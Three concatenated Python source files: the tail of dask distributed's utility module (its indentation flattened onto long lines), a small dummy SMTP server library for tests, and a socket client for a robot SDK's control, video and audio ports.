""" with self._lock: self._stop_unlocked(timeout) def _stop_unlocked(self, timeout): if not self._started: return self._started = False count, real_runner = self._all_loops[self._loop] if count > 1: self._all_loops[self._loop] = count - 1, real_runner else: assert count == 1 del self._all_loops[self._loop] if real_runner is not None: real_runner._real_stop(timeout) def _real_stop(self, timeout): assert self._loop_thread is not None if self._loop_thread is not None: try: self._loop.add_callback(self._loop.stop) self._loop_thread.join(timeout=timeout) with suppress(KeyError): # IOLoop can be missing self._loop.close() finally: self._loop_thread = None def is_started(self): """ Return True between start() and stop() calls, False otherwise. """ return self._started def run_sync(self, func, *args, **kwargs): """ Convenience helper: start the loop if needed, run sync(func, *args, **kwargs), then stop the loop again. """ if self._started: return sync(self.loop, func, *args, **kwargs) else: self.start() try: return sync(self.loop, func, *args, **kwargs) finally: self.stop() @property def loop(self): return self._loop @contextmanager def set_thread_state(**kwargs): old = {} for k in kwargs: try: old[k] = getattr(thread_state, k) except AttributeError: pass for k, v in kwargs.items(): setattr(thread_state, k, v) try: yield finally: for k in kwargs: try: v = old[k] except KeyError: delattr(thread_state, k) else: setattr(thread_state, k, v) @contextmanager def tmp_text(filename, text): fn = os.path.join(tempfile.gettempdir(), filename) with open(fn, "w") as f: f.write(text) try: yield fn finally: if os.path.exists(fn): os.remove(fn) def clear_queue(q): while not q.empty(): q.get_nowait() def is_kernel(): """ Determine if we're running within an IPython kernel >>> is_kernel() False """ # http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session if "IPython" not in sys.modules: # IPython hasn't been imported return False from IPython import 
get_ipython # check for `kernel` attribute on the IPython instance return getattr(get_ipython(), "kernel", None) is not None hex_pattern = re.compile("[a-f]+") @functools.lru_cache(100000) def key_split(s): """ >>> key_split('x') 'x' >>> key_split('x-1') 'x' >>> key_split('x-1-2-3') 'x' >>> key_split(('x-2', 1)) 'x' >>> key_split("('x-2', 1)") 'x' >>> key_split("('x', 1)") 'x' >>> key_split('hello-world-1') 'hello-world' >>> key_split(b'hello-world-1') 'hello-world' >>> key_split('ae05086432ca935f6eba409a8ecd4896') 'data' >>> key_split('<module.submodule.myclass object at 0xdaf372') 'myclass' >>> key_split(None) 'Other' >>> key_split('x-abcdefab') # ignores hex 'x' """ if type(s) is bytes: s = s.decode() if type(s) is tuple: s = s[0] try: words = s.split("-") if not words[0][0].isalpha(): result = words[0].split(",")[0].strip("'(\"") else: result = words[0] for word in words[1:]: if word.isalpha() and not ( len(word) == 8 and hex_pattern.match(word) is not None ): result += "-" + word else: break if len(result) == 32 and re.match(r"[a-f0-9]{32}", result): return "data" else: if result[0] == "<": result = result.strip("<>").split()[0].split(".")[-1] return result except Exception: return "Other" def key_split_group(x): """A more fine-grained version of key_split >>> key_split_group(('x-2', 1)) 'x-2' >>> key_split_group("('x-2', 1)") 'x-2' >>> key_split_group('ae05086432ca935f6eba409a8ecd4896') 'data' >>> key_split_group('<module.submodule.myclass object at 0xdaf372') 'myclass' >>> key_split_group('x') >>> key_split_group('x-1') """ typ = type(x) if typ is tuple: return x[0] elif typ is str: if x[0] == "(": return x.split(",", 1)[0].strip("()\"'") elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x): return "data" elif x[0] == "<": return x.strip("<>").split()[0].split(".")[-1] else: return key_split(x) elif typ is bytes: return key_split_group(x.decode()) else: return key_split(x) @contextmanager def log_errors(pdb=False): from .comm import CommClosedError try: yield 
# NOTE(review): final part of the extraction-mangled distributed/utils.py
# chunk (see note above the imports): tail of log_errors, logging/IP/traceback
# helpers, key/graph utilities, file-reading helpers, DequeHandler, event-loop
# policy setup, CLI helpers, serialization helpers, EmptyContext, LRU and
# clean_dashboard_address.  Tokens kept byte-identical.
except (CommClosedError, gen.Return): raise except Exception as e: try: logger.exception(e) except TypeError: # logger becomes None during process cleanup pass if pdb: import pdb pdb.set_trace() raise def silence_logging(level, root="distributed"): """ Change all StreamHandlers for the given logger to the given level """ if isinstance(level, str): level = getattr(logging, level.upper()) old = None logger = logging.getLogger(root) for handler in logger.handlers: if isinstance(handler, logging.StreamHandler): old = handler.level handler.setLevel(level) return old @toolz.memoize def ensure_ip(hostname): """ Ensure that address is an IP address Examples -------- >>> ensure_ip('localhost') '127.0.0.1' >>> ensure_ip('123.123.123.123') # pass through IP addresses '123.123.123.123' """ # Prefer IPv4 over IPv6, for compatibility families = [socket.AF_INET, socket.AF_INET6] for fam in families: try: results = socket.getaddrinfo( hostname, 1234, fam, socket.SOCK_STREAM # dummy port number ) except socket.gaierror as e: exc = e else: return results[0][4][0] raise exc tblib.pickling_support.install() def get_traceback(): exc_type, exc_value, exc_traceback = sys.exc_info() bad = [ os.path.join("distributed", "worker"), os.path.join("distributed", "scheduler"), os.path.join("tornado", "gen.py"), os.path.join("concurrent", "futures"), ] while exc_traceback and any( b in exc_traceback.tb_frame.f_code.co_filename for b in bad ): exc_traceback = exc_traceback.tb_next return exc_traceback def truncate_exception(e, n=10000): """ Truncate exception to be about a certain length """ if len(str(e)) > n: try: return type(e)("Long error message", str(e)[:n]) except Exception: return Exception("Long error message", type(e), str(e)[:n]) else: return e def tokey(o): """ Convert an object to a string. 
Examples -------- >>> tokey(b'x') b'x' >>> tokey('x') 'x' >>> tokey(1) '1' """ typ = type(o) if typ is str or typ is bytes: return o else: return str(o) def validate_key(k): """Validate a key as received on a stream. """ typ = type(k) if typ is not str and typ is not bytes: raise TypeError("Unexpected key type %s (value: %r)" % (typ, k)) def _maybe_complex(task): """ Possibly contains a nested task """ return ( istask(task) or type(task) is list and any(map(_maybe_complex, task)) or type(task) is dict and any(map(_maybe_complex, task.values())) ) def convert(task, dsk, extra_values): if type(task) is list: return [convert(v, dsk, extra_values) for v in task] if type(task) is dict: return {k: convert(v, dsk, extra_values) for k, v in task.items()} if istask(task): return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:]) try: if task in dsk or task in extra_values: return tokey(task) except TypeError: pass return task def str_graph(dsk, extra_values=()): return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()} def seek_delimiter(file, delimiter, blocksize): """ Seek current file to next byte after a delimiter bytestring This seeks the file to the next byte following the delimiter. It does not return anything. Use ``file.tell()`` to see location afterwards. Parameters ---------- file: a file delimiter: bytes a delimiter like ``b'\n'`` or message sentinel blocksize: int Number of bytes to read from the file at once. """ if file.tell() == 0: return last = b"" while True: current = file.read(blocksize) if not current: return full = last + current try: i = full.index(delimiter) file.seek(file.tell() - (len(full) - i) + len(delimiter)) return except ValueError: pass last = full[-len(delimiter) :] def read_block(f, offset, length, delimiter=None): """ Read a block of bytes from a file Parameters ---------- f: file File-like object supporting seek, read, tell, etc.. 
offset: int Byte offset to start read length: int Number of bytes to read delimiter: bytes (optional) Ensure reading starts and stops at delimiter bytestring If using the ``delimiter=`` keyword argument we ensure that the read starts and stops at delimiter boundaries that follow the locations ``offset`` and ``offset + length``. If ``offset`` is zero then we start at zero. The bytestring returned WILL include the terminating delimiter string. Examples -------- >>> from io import BytesIO # doctest: +SKIP >>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP >>> read_block(f, 0, 13) # doctest: +SKIP b'Alice, 100\\nBo' >>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP b'Alice, 100\\nBob, 200\\n' >>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP b'Bob, 200\\nCharlie, 300' """ if delimiter: f.seek(offset) seek_delimiter(f, delimiter, 2 ** 16) start = f.tell() length -= start - offset f.seek(start + length) seek_delimiter(f, delimiter, 2 ** 16) end = f.tell() offset = start length = end - start f.seek(offset) bytes = f.read(length) return bytes @contextmanager def tmpfile(extension=""): extension = "." + extension.lstrip(".") handle, filename = tempfile.mkstemp(extension) os.close(handle) os.remove(filename) yield filename if os.path.exists(filename): try: if os.path.isdir(filename): shutil.rmtree(filename) else: os.remove(filename) except OSError: # sometimes we can't remove a generated temp file pass def ensure_bytes(s): """Attempt to turn `s` into bytes. Parameters ---------- s : Any The object to be converted. Will correctly handled * str * bytes * objects implementing the buffer protocol (memoryview, ndarray, etc.) 
Returns ------- b : bytes Raises ------ TypeError When `s` cannot be converted Examples -------- >>> ensure_bytes('123') b'123' >>> ensure_bytes(b'123') b'123' """ if isinstance(s, bytes): return s elif hasattr(s, "encode"): return s.encode() else: try: return bytes(s) except Exception as e: raise TypeError( "Object %s is neither a bytes object nor has an encode method" % s ) from e def divide_n_among_bins(n, bins): """ >>> divide_n_among_bins(12, [1, 1]) [6, 6] >>> divide_n_among_bins(12, [1, 2]) [4, 8] >>> divide_n_among_bins(12, [1, 2, 1]) [3, 6, 3] >>> divide_n_among_bins(11, [1, 2, 1]) [2, 6, 3] >>> divide_n_among_bins(11, [.1, .2, .1]) [2, 6, 3] """ total = sum(bins) acc = 0.0 out = [] for b in bins: now = n / total * b + acc now, acc = divmod(now, 1) out.append(int(now)) return out def mean(seq): seq = list(seq) return sum(seq) / len(seq) if hasattr(sys, "is_finalizing"): def shutting_down(is_finalizing=sys.is_finalizing): return is_finalizing() else: _shutting_down = [False] def _at_shutdown(l=_shutting_down): l[0] = True def shutting_down(l=_shutting_down): return l[0] atexit.register(_at_shutdown) shutting_down.__doc__ = """ Whether the interpreter is currently shutting down. For use in finalizers, __del__ methods, and similar; it is advised to early bind this function rather than look it up when calling it, since at shutdown module globals may be cleared. """ def open_port(host=""): """ Return a probably-open port There is a chance that this port will be taken by the operating system soon after returning from this function. 
""" # http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, 0)) s.listen(1) port = s.getsockname()[1] s.close() return port def import_file(path): """ Loads modules for a file (.py, .zip, .egg) """ directory, filename = os.path.split(path) name, ext = os.path.splitext(filename) names_to_import = [] tmp_python_path = None if ext in (".py",): # , '.pyc'): if directory not in sys.path: tmp_python_path = directory names_to_import.append(name) if ext == ".py": # Ensure that no pyc file will be reused cache_file = cache_from_source(path) with suppress(OSError): os.remove(cache_file) if ext in (".egg", ".zip", ".pyz"): if path not in sys.path: sys.path.insert(0, path) names = (mod_info.name for mod_info in pkgutil.iter_modules([path])) names_to_import.extend(names) loaded = [] if not names_to_import: logger.warning("Found nothing to import from %s", filename) else: importlib.invalidate_caches() if tmp_python_path is not None: sys.path.insert(0, tmp_python_path) try: for name in names_to_import: logger.info("Reload module %s from %s file", name, ext) loaded.append(importlib.reload(importlib.import_module(name))) finally: if tmp_python_path is not None: sys.path.remove(tmp_python_path) return loaded class itemgetter: """A picklable itemgetter. Examples -------- >>> data = [0, 1, 2] >>> get_1 = itemgetter(1) >>> get_1(data) 1 """ __slots__ = ("index",) def __init__(self, index): self.index = index def __call__(self, x): return x[self.index] def __reduce__(self): return (itemgetter, (self.index,)) def asciitable(columns, rows): """Formats an ascii table for given columns and rows. Parameters ---------- columns : list The column names rows : list of tuples The rows in the table. Each tuple must be the same length as ``columns``. 
""" rows = [tuple(str(i) for i in r) for r in rows] columns = tuple(str(i) for i in columns) widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns)) row_template = ("|" + (" %%-%ds |" * len(columns))) % widths header = row_template % tuple(columns) bar = "+%s+" % "+".join("-" * (w + 2) for w in widths) data = "\n".join(row_template % r for r in rows) return "\n".join([bar, header, bar, data, bar]) def nbytes(frame, _bytes_like=(bytes, bytearray)): """ Number of bytes of a frame or memoryview """ if isinstance(frame, _bytes_like): return len(frame) else: try: return frame.nbytes except AttributeError: return len(frame) @contextmanager def time_warn(duration, text): start = time() yield end = time() if end - start > duration: print("TIME WARNING", text, end - start) def json_load_robust(fn, load=json.load): """ Reads a JSON file from disk that may be being written as we read """ while not os.path.exists(fn): sleep(0.01) for i in range(10): try: with open(fn) as f: cfg = load(f) if cfg: return cfg except (ValueError, KeyError): # race with writing process pass sleep(0.1) class DequeHandler(logging.Handler): """ A logging.Handler that records records into a deque """ _instances = weakref.WeakSet() def __init__(self, *args, n=10000, **kwargs): self.deque = deque(maxlen=n) super(DequeHandler, self).__init__(*args, **kwargs) self._instances.add(self) def emit(self, record): self.deque.append(record) def clear(self): """ Clear internal storage. """ self.deque.clear() @classmethod def clear_all_instances(cls): """ Clear the internal storage of all live DequeHandlers. 
""" for inst in list(cls._instances): inst.clear() def reset_logger_locks(): """ Python 2's logger's locks don't survive a fork event https://github.com/dask/distributed/issues/1491 """ for name in logging.Logger.manager.loggerDict.keys(): for handler in logging.getLogger(name).handlers: handler.createLock() is_server_extension = False if "notebook" in sys.modules: import traitlets from notebook.notebookapp import NotebookApp is_server_extension = traitlets.config.Application.initialized() and isinstance( traitlets.config.Application.instance(), NotebookApp ) if not is_server_extension: is_kernel_and_no_running_loop = False if is_kernel(): try: get_running_loop() except RuntimeError: is_kernel_and_no_running_loop = True if not is_kernel_and_no_running_loop: # TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below, # once tornado > 6.0.3 is available. if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"): # WindowsProactorEventLoopPolicy is not compatible with tornado 6 # fallback to the pre-3.8 default of Selector # https://github.com/tornadoweb/tornado/issues/2608 BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy else: BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy class AnyThreadEventLoopPolicy(BaseEventLoopPolicy): def get_event_loop(self): try: return super().get_event_loop() except (RuntimeError, AssertionError): loop = self.new_event_loop() self.set_event_loop(loop) return loop asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy()) @functools.lru_cache(1000) def has_keyword(func, keyword): return keyword in inspect.signature(func).parameters @functools.lru_cache(1000) def command_has_keyword(cmd, k): if cmd is not None: if isinstance(cmd, str): try: from importlib import import_module cmd = import_module(cmd) except ImportError: raise ImportError("Module for command %s is not available" % cmd) if isinstance(getattr(cmd, "main"), click.core.Command): cmd = cmd.main if isinstance(cmd, click.core.Command): cmd_params 
= set( [ p.human_readable_name for p in cmd.params if isinstance(p, click.core.Option) ] ) return k in cmd_params return False # from bokeh.palettes import viridis # palette = viridis(18) palette = [ "#440154", "#471669", "#472A79", "#433C84", "#3C4D8A", "#355D8C", "#2E6C8E", "#287A8E", "#23898D", "#1E978A", "#20A585", "#2EB27C", "#45BF6F", "#64CB5D", "#88D547", "#AFDC2E", "#D7E219", "#FDE724", ] @toolz.memoize def color_of(x, palette=palette): h = md5(str(x).encode()) n = int(h.hexdigest()[:8], 16) return palette[n % len(palette)] def iscoroutinefunction(f): return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f) @contextmanager def warn_on_duration(duration, msg): start = time() yield stop = time() if stop - start > parse_timedelta(duration): warnings.warn(msg, stacklevel=2) def typename(typ): """ Return name of type Examples -------- >>> from distributed import Scheduler >>> typename(Scheduler) 'distributed.scheduler.Scheduler' """ try: return typ.__module__ + "." + typ.__name__ except AttributeError: return str(typ) def format_dashboard_link(host, port): template = dask.config.get("distributed.dashboard.link") if dask.config.get("distributed.scheduler.dashboard.tls.cert"): scheme = "https" else: scheme = "http" return template.format( **toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port)) ) def parse_ports(port): """ Parse input port information into list of ports Parameters ---------- port : int, str, None Input port or ports. Can be an integer like 8787, a string for a single port like "8787", a string for a sequential range of ports like "8000:8200", or None. 
Returns ------- ports : list List of ports Examples -------- A single port can be specified using an integer: >>> parse_ports(8787) >>> [8787] or a string: >>> parse_ports("8787") >>> [8787] A sequential range of ports can be specified by a string which indicates the first and last ports which should be included in the sequence of ports: >>> parse_ports("8787:8790") >>> [8787, 8788, 8789, 8790] An input of ``None`` is also valid and can be used to indicate that no port has been specified: >>> parse_ports(None) >>> [None] """ if isinstance(port, str) and ":" not in port: port = int(port) if isinstance(port, (int, type(None))): ports = [port] else: port_start, port_stop = map(int, port.split(":")) if port_stop <= port_start: raise ValueError( "When specifying a range of ports like port_start:port_stop, " "port_stop must be greater than port_start, but got " f"port_start={port_start} and port_stop={port_stop}" ) ports = list(range(port_start, port_stop + 1)) return ports def is_coroutine_function(f): return asyncio.iscoroutinefunction(f) or gen.is_coroutine_function(f) class Log(str): """ A container for logs """ def _repr_html_(self): return "<pre><code>\n{log}\n</code></pre>".format( log=html.escape(self.rstrip()) ) class Logs(dict): """ A container for multiple logs """ def _repr_html_(self): summaries = [ "<details>\n" "<summary style='display:list-item'>{title}</summary>\n" "{log}\n" "</details>".format(title=title, log=log._repr_html_()) for title, log in sorted(self.items()) ] return "\n".join(summaries) def cli_keywords(d: dict, cls=None, cmd=None): """ Convert a kwargs dictionary into a list of CLI keywords Parameters ---------- d: dict The keywords to convert cls: callable The callable that consumes these terms to check them for validity cmd: string or object A string with the name of a module, or the module containing a click-generated command with a "main" function, or the function itself. 
It may be used to parse a module's custom arguments (i.e., arguments that are not part of Worker class), such as nprocs from dask-worker CLI or enable_nvlink from dask-cuda-worker CLI. Examples -------- >>> cli_keywords({"x": 123, "save_file": "foo.txt"}) ['--x', '123', '--save-file', 'foo.txt'] >>> from dask.distributed import Worker >>> cli_keywords({"x": 123}, Worker) Traceback (most recent call last): ... ValueError: Class distributed.worker.Worker does not support keyword x """ if cls or cmd: for k in d: if not has_keyword(cls, k) and not command_has_keyword(cmd, k): if cls and cmd: raise ValueError( "Neither class %s or module %s support keyword %s" % (typename(cls), typename(cmd), k) ) elif cls: raise ValueError( "Class %s does not support keyword %s" % (typename(cls), k) ) else: raise ValueError( "Module %s does not support keyword %s" % (typename(cmd), k) ) def convert_value(v): out = str(v) if " " in out and "'" not in out and '"' not in out: out = '"' + out + '"' return out return sum( [["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], [] ) def is_valid_xml(text): return xml.etree.ElementTree.fromstring(text) is not None try: _offload_executor = ThreadPoolExecutor( max_workers=1, thread_name_prefix="Dask-Offload" ) except TypeError: _offload_executor = ThreadPoolExecutor(max_workers=1) weakref.finalize(_offload_executor, _offload_executor.shutdown) def import_term(name: str): """ Return the fully qualified term Examples -------- >>> import_term("math.sin") <function math.sin(x, /)> """ try: module_name, attr_name = name.rsplit(".", 1) except ValueError: return importlib.import_module(name) module = importlib.import_module(module_name) return getattr(module, attr_name) async def offload(fn, *args, **kwargs): loop = asyncio.get_event_loop() return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs)) def serialize_for_cli(data): """ Serialize data into a string that can be passthrough cli Parameters ---------- 
data: json-serializable object The data to serialize Returns ------- serialized_data: str The serialized data as a string """ return base64.urlsafe_b64encode(json.dumps(data).encode()).decode() def deserialize_for_cli(data): """ De-serialize data into the original object Parameters ---------- data: str String serialied by serialize_for_cli() Returns ------- deserialized_data: obj The de-serialized data """ return json.loads(base64.urlsafe_b64decode(data.encode()).decode()) class EmptyContext: def __enter__(self): pass def __exit__(self, *args): pass async def __aenter__(self): pass async def __aexit__(self, *args): pass empty_context = EmptyContext() class LRU(UserDict): """ Limited size mapping, evicting the least recently looked-up key when full """ def __init__(self, maxsize): super().__init__() self.data = OrderedDict() self.maxsize = maxsize def __getitem__(self, key): value = super().__getitem__(key) self.data.move_to_end(key) return value def __setitem__(self, key, value): if len(self) >= self.maxsize: self.data.popitem(last=False) super().__setitem__(key, value) def clean_dashboard_address(addr, default_listen_ip=""): """ Examples -------- >>> clean_dashboard_address(8787) {'address': '', 'port': 8787} >>> clean_dashboard_address(":8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("foo:8787") {'address': 'foo', 'port': 8787} """ if default_listen_ip == "0.0.0.0": default_listen_ip = "" # for IPV6 try: addr = int(addr) except (TypeError, ValueError): pass if isinstance(addr, str): addr = addr.split(":") if isinstance(addr, (tuple, list)): if len(addr) == 2: host, port = (addr[0], int(addr[1])) elif len(addr) == 1: [host], port = addr, 0 else: raise ValueError(addr) elif isinstance(addr, int): host = default_listen_ip port = addr return {"address": host, "port": port}
smtpretty.py
"""An SMTP server library designed specifically for running test suites. Overview -------- SMTPretty makes it easy to start and stop a local dummy SMTP server from within a test suite, and perform tests and assertions on the sent emails. Usage is straightforward: import smtpretty smtpretty.enable(2525) call_my_test_code({'smtp_host': '127.0.0.1', 'smtp_port': 2525}) assert(len(smtpretty.messages) == 1) assert(smtpretty.last_message.mail_from == 'testfrom@example.com') assert(smtpretty.last_message.recipients == ['testto@example.com']) assert(smtpretty.last_message.body == 'test email') smtpretty.disable() You can also use a decorator to enable/disable automatically: import smtppretty @smtpretty.activate(2525) def test_something(): call_my_test_code({'smtp_host': '127.0.0.1', 'smtp_port': 2525}) assert(len(smtpretty.messages) == 1) assert(smtpretty.last_message.mail_from == 'testfrom@example.com') Caveats and other notes ----------------------- - SMTPretty runs an actual server. This means that in order to run it on port 25, you will need to run it as root. A better approach is to ensure your code can be configured to use an SMTP server on another port. Future versions of SMTPretty might use a different approach (by patching the socket module, as [HTTPretty](https://github.com/gabrielfalcao/HTTPretty) does, though there is no definite plans at the moment); - SMTPretty does not currently allow to test for email sending failures; - SMTPretty can only run one SMTP server instance at a time, which covers the vast majority of use cases, and allows for a straightforward API. smtpretty.messages ------------------ `smtpretty.messages` contains the list of all messages sent since smtpretty was last activated. 
Each message is an instance of a SMTPrettyEmail object, and has the following attributes: - mail_from : String containing the envelope originator - recipients: List of strings defining the envelope recipients - headers : Dictionary of (lower-cased) header to list of values - body : The message body of the first part of the email. This provided as convenience for testing simple messages - raw_message : String containing the message as received - message : An [email.message](https://docs.python.org/2/library/email.message.html) object representing the message. For convenience, `smtpretty.last_message` contains the last sent message. Acknowledgements ---------------- SMTPretty was inspired by this blog post: https://muffinresearch.co.uk/fake-smtp-server-with-python/ and while it does not use the same approach (it runs an actual server rather than patching sockets), the API was inspired by [HTTPretty](https://github.com/gabrielfalcao/HTTPretty) """ import smtpd import threading import asyncore from functools import wraps from email import message_from_string messages = [] last_message = None _server = None _thread = None def enable(port=25, bind='127.0.0.1'): """Enable SMTPretty by starting an SMTP server. 
Parameters ---------- bind : str IP address to bind to port : int Port to bind to """ global _server, _thread, messages if _server is not None: disable() messages = [] last_message = None _server = SMTPrettyServer((bind, port), None) # Thanks to http://stackoverflow.com/questions/14483195/how-to-handle-asyncore-within-a-class-in-python-without-blocking-anything _thread = threading.Thread(target=asyncore.loop, kwargs={'timeout':1}) _thread.start() def disable(): """Disables SMTPretty by stopping the SMTP server""" global _server, _thread if _server is not None: _server.close() _thread.join() _server = None _thread = None def activate(method_or_port=25, bind='127.0.0.1'): """Decorator to enable SMTPretty before entry, and disable it after leaving Note that this can be used as a simple decorator (@activate) or as a parametrized decorator (@activate(port=2525)) """ port = method_or_port def decorator(f): @wraps(f) def wrapper(*args, **kargs): enable(port, bind) try: return f(*args, **kargs) finally: disable() return wrapper # Check whether we were called as a decorator (@activate) or as a function # that returns a decorator (@activate(2525)) if callable(method_or_port): port = 25 return decorator(method_or_port) else: return decorator class SMTPrettyServer(smtpd.SMTPServer): """The SMTP server used to receive the sent messages""" def process_message(self, peer, mail_from, recipients, raw_message): global messages, last_message last_message = SMTPrettyEmail(mail_from, recipients, raw_message) messages.append(last_message) class SMTPrettyEmail(object): """This represents the emails received by SMTPretty Attributes ---------- mail_from : str The envelope originator recipients : list of str The envelope recipients headers : dict A dictionary of (lower-cased) headers to values body : str The message body of the first part of the email. 
This provided as convenience for testing simple messages raw_message : str The raw message body message : email.message The email message parsed as an email.message object Parameters ---------- message : str The raw email body """ def __init__(self, mail_from, recipients, raw_message): self.mail_from = mail_from self.recipients = recipients self.raw_message = raw_message self.message = message_from_string(self.raw_message) self.headers = dict([(k.lower(), v) for (k, v) in self.message.items()]) self.body = self._get_body(self.message) def _get_body(self, message): if message.is_multipart(): p = message.get_payload() if len(p) > 0: return p[0].get_payload() else: return '' else: return message.get_payload()
robot_connection.py
#! python3
import socket
import threading
import select
import queue


class RobotConnection(object):
    """
    Create a RobotConnection object with a given robot ip.

    Wraps the robot's plain-text SDK ports: TCP control/event/video/audio
    channels plus UDP push and ip-broadcast channels.  A background thread
    multiplexes the connected sockets with select() and fans incoming data
    out into bounded per-socket queues.
    """
    VIDEO_PORT = 40921
    AUDIO_PORT = 40922
    CTRL_PORT = 40923
    PUSH_PORT = 40924
    EVENT_PORT = 40925
    IP_PORT = 40926

    def __init__(self, robot_ip=''):
        self.robot_ip = robot_ip

        self.video_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.audio_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.ctrl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.push_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.event_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.ip_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        # Push and broadcast data arrive over UDP, so those sockets are bound
        # locally instead of being connected to the robot.
        self.push_socket.bind(('', RobotConnection.PUSH_PORT))
        self.ip_socket.bind(('', RobotConnection.IP_PORT))

        # Sockets watched by the receive thread; video/audio are appended on
        # demand by start_video_recv()/start_audio_recv().
        self.cmd_socket_list = [self.ctrl_socket, self.push_socket, self.event_socket]

        # Bounded queues; when a queue is full the oldest entry is dropped by
        # the receive thread before a new one is enqueued.
        self.cmd_socket_msg_queue = {
            self.video_socket: queue.Queue(32),
            self.audio_socket: queue.Queue(32),
            self.ctrl_socket: queue.Queue(16),
            self.push_socket: queue.Queue(16),
            self.event_socket: queue.Queue(16)
        }

        self.cmd_socket_recv_thread = threading.Thread(target=self.__socket_recv_task)

        # True until open() succeeds; also tells the receive thread to stop.
        self.is_shutdown = True

    def update_robot_ip(self, robot_ip):
        """
        Update the robot ip
        """
        self.robot_ip = robot_ip

    def get_robot_ip(self, timeout=None):
        """
        Get the robot ip from the ip broadcast port

        If optional arg 'timeout' is None (the default), block if necessary
        until the robot ip is read from the broadcast port.  If 'timeout' is
        a non-negative number, it blocks at most 'timeout' seconds and
        returns None if no data came back from the robot broadcast port
        within the time.  Otherwise, return the robot ip immediately.
        """
        self.ip_socket.settimeout(timeout)
        msg = None
        try:
            msg, addr = self.ip_socket.recvfrom(1024)
        except Exception as e:
            # Timeout or socket failure: fall through and return None.
            print('Get robot ip failed, please check the robot networking-mode and connection !')
        else:
            # Broadcast payload looks like '...robot ip <addr>'; keep the tail.
            msg = msg.decode('utf-8')
            msg = msg[msg.find('robot ip ') + len('robot ip ') : ]
        return msg

    def open(self):
        """
        Open the connection

        It will connect the control port and event port with TCP and start a
        data receive thread.
        """
        self.ctrl_socket.settimeout(5)
        try:
            self.ctrl_socket.connect((self.robot_ip, RobotConnection.CTRL_PORT))
            self.event_socket.connect((self.robot_ip, RobotConnection.EVENT_PORT))
        except Exception as e:
            print('Connection failed, the reason is %s'%e)
            return False
        else:
            # Must be cleared before starting the thread: the thread's loop
            # condition reads is_shutdown.
            self.is_shutdown = False
            self.cmd_socket_recv_thread.start()
            print('Connection successful')
            return True

    def close(self):
        """
        Close the connection
        """
        # The receive thread notices is_shutdown within its 2 s select()
        # timeout, shuts the sockets down itself, then exits.
        self.is_shutdown = True
        self.cmd_socket_recv_thread.join()

    def start_video_recv(self):
        # Connect the TCP video stream and add it to the select() watch list.
        assert not self.is_shutdown, 'CONNECTION INVALID'
        if self.video_socket not in self.cmd_socket_list:
            self.video_socket.settimeout(5)
            try:
                self.video_socket.connect((self.robot_ip, RobotConnection.VIDEO_PORT))
            except Exception as e:
                print('Connection failed, the reason is %s'%e)
                return False
            self.cmd_socket_list.append(self.video_socket)
        return True

    def stop_video_recv(self):
        # Only removes the socket from the watch list; the socket stays open.
        if self.video_socket in self.cmd_socket_list:
            self.cmd_socket_list.remove(self.video_socket)
        return True

    def start_audio_recv(self):
        # Connect the TCP audio stream and add it to the select() watch list.
        assert not self.is_shutdown, 'CONNECTION INVALID'
        if self.audio_socket not in self.cmd_socket_list:
            self.audio_socket.settimeout(5)
            try:
                self.audio_socket.connect((self.robot_ip, RobotConnection.AUDIO_PORT))
            except Exception as e:
                print('Connection failed, the reason is %s'%e)
                return False
            self.cmd_socket_list.append(self.audio_socket)
        return True

    def stop_audio_recv(self):
        # Only removes the socket from the watch list; the socket stays open.
        if self.audio_socket in self.cmd_socket_list:
            self.cmd_socket_list.remove(self.audio_socket)
        return True

    def send_data(self, msg):
        """
        Send data to control port

        The SDK protocol terminates every command with ';'.
        """
        msg += ';'
        self.__send_data(self.ctrl_socket, msg)

    def recv_video_data(self, timeout=None, latest_data=False):
        """
        Receive video data

        If optional arg 'timeout' is None (the default), block if necessary
        until data arrives from the video port.  If 'timeout' is a
        non-negative number, it blocks at most 'timeout' seconds and returns
        None if no data came back from the robot video port within the time.
        Otherwise, return the data immediately.

        If optional arg 'latest_data' is set to True, it will return the
        latest data, instead of the data at the queue tail.
        """
        return self.__recv_data(self.video_socket, timeout, latest_data)

    def recv_audio_data(self, timeout=None, latest_data=False):
        """
        Receive audio data

        If optional arg 'timeout' is None (the default), block if necessary
        until data arrives from the audio port.  If 'timeout' is a
        non-negative number, it blocks at most 'timeout' seconds and returns
        None if no data came back from the robot audio port within the time.
        Otherwise, return the data immediately.

        If optional arg 'latest_data' is set to True, it will return the
        latest data, instead of the data at the queue tail.
        """
        return self.__recv_data(self.audio_socket, timeout, latest_data)

    def recv_ctrl_data(self, timeout=None, latest_data=False):
        """
        Receive control data

        If optional arg 'timeout' is None (the default), block if necessary
        until data arrives from the control port.  If 'timeout' is a
        non-negative number, it blocks at most 'timeout' seconds and returns
        None if no data came back from the robot control port within the
        time.  Otherwise, return the data immediately.

        If optional arg 'latest_data' is set to True, it will return the
        latest data, instead of the data at the queue tail.
        """
        return self.__recv_data(self.ctrl_socket, timeout, latest_data)

